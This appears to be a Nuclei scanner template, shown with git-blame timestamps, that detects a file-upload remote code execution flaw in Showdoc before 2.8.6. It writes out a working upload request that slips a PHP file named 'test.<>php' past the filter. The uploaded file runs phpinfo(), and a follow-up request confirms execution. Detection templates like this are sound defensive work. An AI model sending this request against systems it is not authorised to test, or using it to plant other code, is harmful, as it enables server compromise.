2021-04-21 19:34:21 +00:00
|
|
|
id: showdoc-file-upload-rce
|
|
|
|
|
info:
|
|
|
|
|
name: Showdoc < 2.8.6 File Upload RCE
|
|
|
|
|
author: pikpikcu
|
|
|
|
|
severity: critical
|
|
|
|
|
reference: https://github.com/star7th/showdoc/pull/1059
|
2021-05-09 20:04:11 +00:00
|
|
|
tags: rce,fileupload,showdoc
|
2021-04-21 19:34:21 +00:00
|
|
|
|
|
|
|
|
requests:
|
|
|
|
|
- raw:
|
|
|
|
|
- |
|
|
|
|
|
POST /index.php?s=/home/page/uploadImg HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
|
|
|
|
|
Content-Length: 239
|
|
|
|
|
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
|
|
|
|
|
Accept-Encoding: gzip
|
|
|
|
|
|
|
|
|
|
----------------------------835846770881083140190633
|
|
|
|
|
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
|
|
|
|
|
Content-Type: text/plain
|
|
|
|
|
|
|
|
|
|
<?php phpinfo();?>
|
|
|
|
|
----------------------------835846770881083140190633--
|
|
|
|
|
|
|
|
|
|
- |
|
2021-05-09 20:03:27 +00:00
|
|
|
GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1
|
2021-04-21 19:34:21 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
Origin: {{BaseURL}}
|
|
|
|
|
|
|
|
|
|
extractors:
|
|
|
|
|
- type: regex
|
2021-05-09 20:03:27 +00:00
|
|
|
name: path
|
2021-04-21 19:34:21 +00:00
|
|
|
group: 1
|
|
|
|
|
internal: true
|
|
|
|
|
part: body
|
|
|
|
|
regex:
|
2021-05-09 20:03:27 +00:00
|
|
|
- '/Uploads\\(.*?)"\,"success"'
|
2021-04-21 19:34:21 +00:00
|
|
|
|
|
|
|
|
req-condition: true
|
|
|
|
|
matchers:
|
|
|
|
|
- type: dsl
|
|
|
|
|
dsl:
|
|
|
|
|
- 'contains(body_2, "PHP Extension")'
|
|
|
|
|
- 'contains(body_2, "PHP Version")'
|
|
|
|
|
- 'status_code_2 == 200'
|
|
|
|
|
condition: and
|
